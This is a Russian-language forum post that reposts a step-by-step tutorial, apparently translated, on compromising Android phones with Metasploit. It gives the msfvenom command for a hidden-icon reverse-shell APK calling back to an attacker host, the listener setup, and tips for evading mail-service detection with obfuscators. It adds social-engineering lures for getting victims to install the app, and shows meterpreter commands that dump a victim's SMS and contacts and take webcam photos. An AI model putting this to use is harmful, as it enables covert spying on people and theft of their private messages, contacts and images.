Основы Metasploit, часть 13: Эксплуатация мобильных устройств Android

  • Автор темы Автор темы LeSh1y777
  • Дата начала Дата начала

LeSh1y777

Пользователь
Регистрация
25/9/25
Сообщения
5,682
Репутация
49
Лайки
153
Депозит
-8.95$
Добро пожаловать обратно, мои начинающие хакеры!

За последние 10 лет рынок мобильных устройств стремительно вырос. С момента своего зарождения в 2007 году с появлением смартфона Apple, к 2020 году на мобильные устройства приходится более 50% всего интернет-трафика. На планете насчитывается 5 миллиардов мобильных устройств, что примерно соответствует одному устройству на 3/4 населения мира. 75% этих устройств работают на базе операционной системы Android. Учитывая доминирование Android на рынке, вполне логично, что мы сосредоточим наше внимание на этой доминирующей операционной системе.

6a4a49_8cb497375f5b4e6eb388d22b363883bf~mv2.jpg


В этом руководстве мы будем использовать Metasploit для взлома устройств Android, таких как планшеты и телефоны. Как вы увидите, после взлома устройства Android мы сможем собирать текстовые сообщения, список контактов, местоположение жертвы и даже включать её веб-камеру!

По состоянию на 2020 год вредоносные приложения по-прежнему остаются наиболее распространённым методом взлома мобильных устройств Android: почти 80% всех атак совершаются именно с их помощью. Пользователи Android всё чаще сталкиваются с необходимостью устанавливать сторонние приложения, поскольку хотят попробовать уникальные приложения, недоступные в магазине Google Play.

Пользователи Android могут включить загрузку и установку сторонних приложений, просто выполнив следующие шаги.

1. Откройте настройки вашего Android-устройства.

2. Выберите опцию «Приложения и уведомления» .

3.
Просто включите опцию «Неизвестные источники».

Примечание:
Если вы не нашли эту опцию на вкладке «Приложения и уведомления» , попробуйте найти её в разделе «Безопасность» устройства .

6a4a49_a65f7b0a9b484632b364db921f6bd87e~mv2.png


В этом руководстве мы разработаем собственный вредоносный APK-файл, который затем должен быть установлен пользователем из стороннего приложения или физически установлен злоумышленником.

Шаг №1: Найдите уязвимости Android

Первый шаг — поиск эксплойтов Android в Metasploit.

В Metasploit существует множество эксплойтов для взлома Android. Быстрый поиск позволяет найти следующие:

msf > тип поиска: эксплойт платформа: android

6a4a49_e33245f9f0974eeeb50fdeb0f07b47b2~mv2.png


Как вы можете видеть, в Metasploit имеется не менее 12 эксплойтов для операционных систем Android.

Шаг №2: Найдите полезные данные Android

Как вы видели в предыдущих уроках по основам Metasploit, Metasploit имеет множество полезных нагрузок , специфичных для операционной системы и эксплойта. Если мы хотим эксплуатировать уязвимость Android, нам понадобится полезная нагрузка Android.

Специфические полезные нагрузки Android можно найти с помощью поиска:

msf > тип поиска: полезная нагрузка платформа: android

6a4a49_fafd66e8993b4d7b97ed1de4e86f70f8~mv2.png


Как вы можете видеть, существует множество полезных нагрузок, специфичных для Android, включая payload/android/meterpreter/reverse_tcp , которую мы будем здесь использовать, но можно использовать и другие.

Шаг №3: Создайте APK-файл

Один из самых простых способов взломать систему Android — создать APK-файл (файл Android PacKage) и попросить жертву установить его на свой телефон или планшет. Обычно это делается через физический доступ к телефону или с помощью социальной инженерии («Здравствуйте, это служба технической поддержки. Мы обнаружили необычную активность на вашем телефоне и должны установить приложение службы технической поддержки для отслеживания этой активности…» и т. д.).

Как мы узнали в Основах Metasploit, часть 9 , мы можем использовать утилиту msfvenom в Metasploit для создания собственных полезных нагрузок. В данном случае мы преобразуем payload/android/meterpreter/reverse_tcp в файл .apk для Android.

Для этого введите следующую команду.

msf > msfvenom -p android/meterpreter/reverse_tcp AndroidHideAppIcon=true AndroidWakeLock=true LHOST=192.168.1.101 LPORT=6996 -f raw -o HackersAriseMalwareApp.apk AndroidMalware.apk

6a4a49_729d1fffcf5347d8ba0d2ec5ad326f14~mv2.png


Где:

msfvenom
команда для создания вредоносной нагрузки

-p android/meterpreter_reverse_tcp имя полезной нагрузки Android

AndroidHideAppIcon=true опция скрывает значок приложения от пользователя

AndroidWakeLock=true — эта опция не даёт телефону перейти в «спящий» режим.

LHOST=192.168.1.101 это IP-адрес злоумышленника (Kali)

LPORT = 6996 это порт для обратной связи со злоумышленником

-f raw — создает полезную нагрузку в формате raw (-f)

-o HackersAriseMalwar
eApp.apk
это имя приложения для вывода (- o)

Обратите внимание, что выходные данные жалуются на то, что «Платформа не выбрана» и «Архитектура не выбрана», но msfvenom достаточно умен, чтобы определить по выбранной вами полезной нагрузке, что платформа — Android, а архитектура — Dalvik.

Дополнительную информацию об использовании msfvenom для создания пользовательских полезных нагрузок можно найти в моем руководстве здесь.

Шаг №4: Настройка прослушивателя нескольких обработчиков

Теперь, когда у нас есть APK-файл со встроенной полезной нагрузкой Android, нам нужно открыть прослушиватель в нашей системе для приема подключений от HackersAriseMalwareApp.apk после его установки и запуска. Если вы читали «Основы Metasploit, часть 12» , мы создали rc-скрипт для автоматического запуска и открытия прослушивателя для приема внешних подключений к нашему Metasploit. Если вы это сделали, теперь вы можете запустить его, введя:

msf > resource handler_http.rc

Если у вас нет скрипта прослушивателя, вы можете запустить прослушиватель, введя следующие команды:

msf >использовать эксплойт/мульти/обработчик

msf >set PAYLOAD android/meterpreter/reverse_tcp

msf >set LHOST 192.168.1.101

msf > установить LPORT 6996

msf > эксплуатировать


Вы должны убедиться, что PAYLOAD, LPORT и LHOST те же самые, что вы использовали при создании файла .apk в msfvenom.

Шаг № 5: Доставьте HackersAriseMalwareApp.apk в цель

Следующий шаг, конечно же, — доставка APK-файла на мобильное устройство жертвы. Если у вас есть физический доступ к устройству, просто установите HackersAriseMalwareApp.apk . В противном случае вам придётся отправить его жертве по электронной почте, через DropBox или другими способами. Важно отметить, что этот файл, скорее всего, будет помечен Gmail и другими почтовыми сервисами как вредоносный. Поэтому рассмотрите возможность перекодирования полезной нагрузки с помощью OWASP-ZSC или другого программного обеспечения для обфускации, например, Shellter или Veil-Evasion.

Кроме того, вы можете рассмотреть возможность размещения .apk на своем собственном веб-сайте и призывать людей загружать его.

Шаг №6: Использование целевой системы

После установки .apk-файла на целевой платформе мы должны увидеть приглашение meterpreter, как показано ниже. Затем введите команду sysinfo, чтобы убедиться, что мы на Android-устройстве!

meterpreter > sysinfo

6a4a49_6fd56bb48a2443849544023cf38c25c0~mv2.png
Затем мы можем ввести help , чтобы увидеть все команды Android meterpreter.

meterpreter > помощь

6a4a49_fe11a281b64643d9b6b638f09976ba63~mv2.png


Обратите внимание, что в Android meterpreter есть уникальные опции, такие как:

dump_calllog

dump_contacts

dump_sms

геолокация

send_sms


Эти команды позволяют нам видеть практически всё, что делает цель на этом устройстве, а также определять её местоположение. Этот meterpreter также может использовать некоторые другие стандартные команды meterpreter, такие как:

запись_микрофон

webcam_snap

веб-камера_трансляция

Шаг №7: Сбор данных с устройства Android


Давайте начнем с получения текстовых сообщений цели.

meterpreter > dump_sms

6a4a49_1908b3ab50904d8fb4e508199897e444~mv2.png


Теперь давайте получим список их контактов.

meterpreter > dump_contacts

6a4a49_af74418a47d54ff68fb1596d016b0636~mv2.png


Наконец, попробуйте составить список их веб-камер, чтобы позже мы могли сделать с них снимки.

meterpreter > webcam_list

6a4a49_28d4f0c07eef4c2a8c280541a537a4fe~mv2.png


Теперь, когда у нас есть список веб-камер на устройстве, мы можем использовать команду meterpreter webcam_snap, а затем номер веб-камеры, чтобы сделать снимки цели с задней камеры.

meterpreter > webcam_snap 1

6a4a49_ed008ee363f14a119a36eb5ba36aad31~mv2.jpg


Заключение

Metasploit — самая популярная в мире платформа для взлома и пентестинга, способная эксплуатировать практически любую систему, включая мобильные устройства Android. Мы можем создать вредоносный APK-файл, и когда жертва установит приложение, мы получим практически неограниченный доступ к его текстовым сообщениям, контактам и веб-камерам!

Ждите мою новую книгу «Основы Metasploit для хакеров», которая выйдет осенью 2020 года!

6a4a49_66b3fa7335fb4f54bd8054e72dc282d2~mv2.png
 
Назад
Сверху Снизу